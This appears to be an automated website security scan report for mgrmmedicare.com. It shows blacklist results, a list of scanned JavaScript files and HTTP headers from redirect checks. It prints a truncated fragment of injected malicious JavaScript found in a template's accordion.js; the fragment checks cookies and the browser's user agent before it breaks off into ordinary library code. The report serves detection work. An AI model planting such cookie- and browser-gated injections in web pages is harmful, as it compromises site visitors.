Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mgrmmedicare.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mgrmmedicare.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mgrmmedicare.com/ | 200 OK Content-Length: 45997 Content-Type: text/html | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/jquery.js | 200 OK Content-Length: 57272 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/animatedcollapse.js | 200 OK Content-Length: 11611 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/accordion.js | 200 OK Content-Length: 16600 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u } } }; obj.remove = function ( el ) { var item, list; if (item = _getItem(el)) { if (list = _getList (item)) { return _removeItem (item, list); } } }; return obj; }(); })(); YAHOO.register("accordion", YAHOO.widget.AccordionManager, {version: "1.5.0", build: "203"}); Antivirus reports:
| ||
http://mgrmmedicare.com/templates/yoo_pure/js/utilities.js | 200 OK Content-Length: 106278 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/bubbling.js | 200 OK Content-Length: 12188 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/js/mediaobject.js?v=105 | 200 OK Content-Length: 2850 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/js/jcemediabox.js?v=105 | 200 OK Content-Length: 40741 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/addons/default.js?v=105 | 200 OK Content-Length: 1439 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/addons/twitter.js?v=105 | 200 OK Content-Length: 461 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/media/system/js/caption.js | 200 OK Content-Length: 1779 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1555 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1216 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/menu.js | 200 OK Content-Length: 3951 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/fancymenu.js | 200 OK Content-Length: 3124 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mgrmmedicare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 23:07:23 GMT
Server: Apache mod_fcgid/2.3.10-dev
Content-Length: 45997
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3fd6bb4d92a42aaeac9a1d099ad3c519=5ee34ed7ad3cbc51d5ea7ae09ee2d880; path=/
X-Powered-By: PHP/5.4.31
...45997 bytes of data.
GET / HTTP/1.1
Host: mgrmmedicare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 23:07:23 GMT
Server: Apache mod_fcgid/2.3.10-dev
Content-Length: 45997
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3fd6bb4d92a42aaeac9a1d099ad3c519=5ee34ed7ad3cbc51d5ea7ae09ee2d880; path=/
X-Powered-By: PHP/5.4.31
...45997 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mgrmmedicare.com
Referer: http://www.google.com/search?q=mgrmmedicare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mgrmmedicare.com
Referer: http://www.google.com/search?q=mgrmmedicare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.